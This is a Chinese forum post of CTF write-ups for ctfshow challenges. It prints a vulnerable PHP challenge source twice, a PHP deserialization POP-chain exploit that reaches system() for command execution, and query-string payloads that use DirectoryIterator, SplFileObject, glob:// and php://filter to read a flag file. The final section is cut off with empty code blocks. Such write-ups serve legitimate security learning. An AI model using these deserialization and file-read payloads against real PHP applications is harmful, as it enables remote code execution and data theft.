ctfshow的一些wp

火影  金牌会员 | 2022-8-26 09:23:58 | 显示全部楼层 | 阅读模式
打印 上一主题 下一主题
楼主

主题 865|帖子 865|积分 2595

1. ctfshow  击剑杯 esaypop(反序列化构造pop链)

题目地址:https://ctf.show/challenges
题目源码:
highlight_file (FILE);
点击查看代码
  1. highlight_file (__FILE__);
  2. error_reporting(0);
  3. class action_1{
  4.     public $tmp;
  5.     public $fun = 'system';
  6.     public function __call($wo,$jia){
  7.         call_user_func($this->fun);
  8.     }
  9.     public function __wakeup(){
  10.         $this->fun = '';
  11.         die("阿祖收手吧,外面有套神");
  12.     }
  13.     public function __toString(){
  14.         return $this->tmp->str;
  15.     }
  16. }
  18. class action_2{
  19.     public $p;
  20.     public $tmp;
  21.     public function getFlag(){
  22.         if (isset($_GET['ctfshow'])) {
  23.             $this->tmp = $_GET['ctfshow'];
  24.         }
  25.         system("cat /".$this->tmp);
  26.     }
  27.     public function __call($wo,$jia){
  28.         phpinfo();
  29.     }
  30.     public function __wakeup(){
  31.         echo "<br>";
  32.         echo "php版本7.3哦,没有人可以再绕过我了";
  33.         echo "<br>";
  34.     }
  35.     public function __get($key){
  36.         $function = $this->p;
  37.         return $function();
  38.     }
  39. }
  41. class action_3{
  42.     public $str;
  43.     public $tmp;
  44.     public $ran;
  45.     public function __construct($rce){
  46.         echo "送给你了";
  47.         system($rce);
  48.     }
  49.     public function __destruct(){
  50.         urlencode($this->str);
  51.     }
  52.     public function __get($jia){
  53.         if(preg_match("/action_2/",get_class($this->ran))){
  54.             return "啥也没有";
  55.         }
  56.         return $this->ran->$jia();
  57.     }
  58. }
  60. class action_4{
  61.     public $ctf;
  62.     public $show;
  63.     public $jia;
  64.     public function __destruct(){
  65.         $jia = $this->jia;
  66.         echo $this->ran->$jia;
  67.     }
  68.     public function append($ctf,$show){
  69.         echo "<br>";
  70.         echo new $ctf($show);
  71.     }
  72.     public function __invoke(){
  73.         $this->append($this->ctf,$this->show);
  74.     }
  75. }
  76. if(isset($_GET['pop'])){
  77.     $pop = $_GET['pop'];
  78.     $output = unserialize($pop);
  79.     if(preg_match("/php/",$output)){
  80.             echo "套神黑进这里并给你了一个提示:文件名是f开头的形如fA6_形式的文件";
  81.             die("不可以用伪协议哦");
  82.         }
  83. }
  86. error_reporting(0);
  87. class action_1{
  88.     public $tmp;
  89.     public $fun = 'system';
  90.     public function __call($wo,$jia){
  91.         call_user_func($this->fun);
  92.     }
  93.     public function __wakeup(){
  94.         $this->fun = '';
  95.         die("阿祖收手吧,外面有套神");
  96.     }
  97.     public function __toString(){
  98.         return $this->tmp->str;
  99.     }
  100. }
  102. class action_2{
  103.     public $p;
  104.     public $tmp;
  105.     public function getFlag(){
  106.         if (isset($_GET['ctfshow'])) {
  107.             $this->tmp = $_GET['ctfshow'];
  108.         }
  109.         system("cat /".$this->tmp);
  110.     }
  111.     public function __call($wo,$jia){
  112.         phpinfo();
  113.     }
  114.     public function __wakeup(){
  115.         echo "<br>";
  116.         echo "php版本7.3哦,没有人可以再绕过我了";
  117.         echo "<br>";
  118.     }
  119.     public function __get($key){
  120.         $function = $this->p;
  121.         return $function();
  122.     }
  123. }
  125. class action_3{
  126.     public $str;
  127.     public $tmp;
  128.     public $ran;
  129.     public function __construct($rce){
  130.         echo "送给你了";
  131.         system($rce);
  132.     }
  133.     public function __destruct(){
  134.         urlencode($this->str);
  135.     }
  136.     public function __get($jia){
  137.         if(preg_match("/action_2/",get_class($this->ran))){
  138.             return "啥也没有";
  139.         }
  140.         return $this->ran->$jia();
  141.     }
  142. }
  144. class action_4{
  145.     public $ctf;
  146.     public $show;
  147.     public $jia;
  148.     public function __destruct(){
  149.         $jia = $this->jia;
  150.         echo $this->ran->$jia;
  151.     }
  152.     public function append($ctf,$show){
  153.         echo "<br>";
  154.         echo new $ctf($show);
  155.     }
  156.     public function __invoke(){
  157.         $this->append($this->ctf,$this->show);
  158.     }
  159. }
  160. if(isset($_GET['pop'])){
  161.     $pop = $_GET['pop'];
  162.     $output = unserialize($pop);
  163.     if(preg_match("/php/",$output)){
  164.             echo "套神黑进这里并给你了一个提示:文件名是f开头的形如fA6_形式的文件";
  165.             die("不可以用伪协议哦");
  166.         }
  167. }
复制代码
审计第一步找到有用的执行函数,找到action3里面的system,发现system在action3的析构函数中,也就是需要new action()才行,跟进找到action4中的append函数中包含 echo new $ctf($show); 而__invoke()函数调用的append,所以我们需要触发action4中的invoke函数,那就需要找到能将action4当做函数执行的,action2中的__get()方法就可以将控制$p为然后将$p当做函数执行,那么现在问题变成如何触发__get()方法,刚好action4里面有一句echo $this->ran->$jia;,那么如果让$ran赋值为类action2,而action2里面没有$jia,导致了触发__get()方法,所以这里就是是入口了
pop链为:action4中的$this->ran->$jia->action2中的__get()->action4中的__invoke()->append()->action3的system($rce);
然后再看传参,$rce就是传过来的$show,,所以$show=需要执行的命令
payload:
$obj4 = new action_4();
$obj2 = new action_2();
$obj4->ran = $obj2;
$obj2->p = $obj4;
$obj4->ran = $obj2;
$obj4->jia = '1';
$obj4->ctf = 'action_3';
$obj4->show = '语句';
echo urlencode(serialize($obj4));
这里的语句先执行find / -name f[A-z][0-9]_*,因为给的提示并不直接,饶了一下,直接找fA6_*是找不到的,然后发现文件名为fz3_.txt,再执行cat /fz3.txt(此处是我执行反弹shell失败了,不然的话不用踩这个文件名的坑)
ps:本体官方也有wp,不过思路有些不一样而已,这要是我想大佬咨询所得,仅当做个人学习的参考~
2. ctfhshow卷王杯 easyweb

打开通过页面源码提示获得源码
第一个绕过,让c=2^63-2=9223372036854775806(64位机),当++$c时达到int的最大值,这样$count[] = 1 就会溢出int的范围从而使得赋值失败,if语句为false
第二个绕过,使用DirectoryIterator类结合glob协议寻找flag:
a=DirectoryIterator&b=glob://flag[a-zA-Z0-9]*.php,获得真flag的文件名
使用SplFileObject结合伪协议读取flag内容:
a=SplFileObject&b=php://filter/convert.base64-encode/resource=flag文件名
payload:
1.
c=9223372036854775806&a=DirectoryIterator&b=glob://flag[a-zA-Z0-9]*.php
2.
c=9223372036854775806&a=SplFileObject&b=php://filter/convert.base64-encode/resource=第一步得到的flag文件名
ps:还是向大佬咨询所得,太菜了,啥也不会~
3. ctfshow新春欢乐赛某些题解


  • web2
    源码如下:
    点击查看代码[code][/code]
可以POST传一个数组进去,而$$$$$${key($_POST)}这一段代码实际就是获得传进来的数组的key,也就是键值的值...然后作为call_user_func函数的参数。而我们需要该参数可控,可以传入一对键值相等的数组不就可以达到目的了,比如传入1=1,那么最后该参数一定是1,看到代码中有个session_start();,看了下cookie有个PHPSESSID,想到session_id()函数:

那么我们可以修改PHPSESSID=HappyNewYear,然后上传session_id=session_id就可以通过if了,下面是调试环节:
这是我修改一点后的本地复现代码:
    点击查看代码[code]

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有账号?立即注册

x
回复

使用道具 举报

0 个回复

倒序浏览
返回列表

快速回复

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 or 立即注册

本版积分规则

火影

金牌会员
这个人很懒什么都没写!

楼主热帖

标签云

存储 挺好的 服务器
微信订阅号
微信服务号
微信客服
小程序
H5
关于我们 商务合作 网站地图
©Copyright 2022-2024 杭州祥升科技有限公司 版权所有 浙ICP备20004199号
快速回复 返回顶部 返回列表